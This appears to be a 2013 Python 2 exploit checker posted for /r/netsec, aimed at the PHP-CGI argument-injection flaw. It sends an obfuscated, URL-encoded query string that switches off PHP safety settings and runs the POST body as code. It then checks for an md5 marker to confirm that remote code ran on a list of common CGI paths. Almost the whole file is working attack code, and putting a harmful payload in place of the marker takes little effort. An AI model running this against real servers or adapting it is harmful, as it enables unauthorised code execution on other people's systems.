#!/usr/bin/python2
# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - insecurety.net - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys

def scan(target):
    paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
    for path in paths:
        probe(target, path)

def probe(target, path):
    print "[*] Testing Path: %s" %(path)
    trigger = path + "/?"
    trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
    trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
    trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
    trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
    trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
    trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
    trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
    trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
    trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
    trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
    trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
    trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
    url = target + trigger
    php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
    try:
        haxor = requests.post(url, php)
        if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
            print "Exploitable!"
    except Exception:
        print "Err, Someshit broke"

def main(args):
    if len(sys.argv) !=2:
        print "Usage: %s <target>" %(sys.argv[0])
        print "Eg: %s http://lol.com" %(sys.argv[0])
        sys.exit(0)
    target = sys.argv[1]
    print "[*] Target is: %s" %(target)
    scan(target)

if __name__ == "__main__":
    main(sys.argv)
#_EOF infodox 2013